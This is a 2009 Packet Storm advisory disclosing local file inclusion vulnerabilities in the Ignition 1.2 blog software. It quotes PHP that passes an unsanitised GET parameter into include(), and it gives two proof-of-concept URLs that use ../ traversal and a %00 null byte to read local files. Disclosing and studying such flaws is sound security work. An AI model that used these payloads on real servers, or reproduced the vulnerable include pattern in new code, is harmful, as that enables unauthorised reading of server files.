Ignition 1.2 Local File Inclusion

2009-12-21T00:00:00
ID PACKETSTORM:84128
Type packetstorm
Reporter cOndemned
Modified 2009-12-21T00:00:00

Description

                                        
                                            `Ignition 1.2 Multiple Local File Inclusion Vulnerabilities  
disclosed by cOndemned  
download: http://launchpadlibrarian.net/27567060/ignition_1.2.zip  
note: magic_quotes_gpc should be turned off in order to exploit this vulnerability  
greetz: all friends, SecurityReason team :)  
  
  
comment.php  
  
1. <?php  
2. session_start();  
3. require ('settings.php');  
4. include ('posts/'.$_GET['blog'].'.txt'); # [1]  
5. ?>  
  
  
view.php  
  
1. <?php  
2. session_start();  
3. require ('settings.php');  
4. $blog = $_GET['blog'];  
5. if (file_exists('posts/'.$_GET['blog'].'.txt')) {  
6. include ('posts/'.$_GET['blog'].'.txt'); # [2]  
7. }else{  
  
  
proof of concept:  
  
[1] http://[attacked_box]/[ignition1.2]/comment.php?blog=../../../../[local_file]%00  
[2] http://[attacked_box]/[ignition1.2]/view.php?blog=../../../../../[local_file]%00  
  
`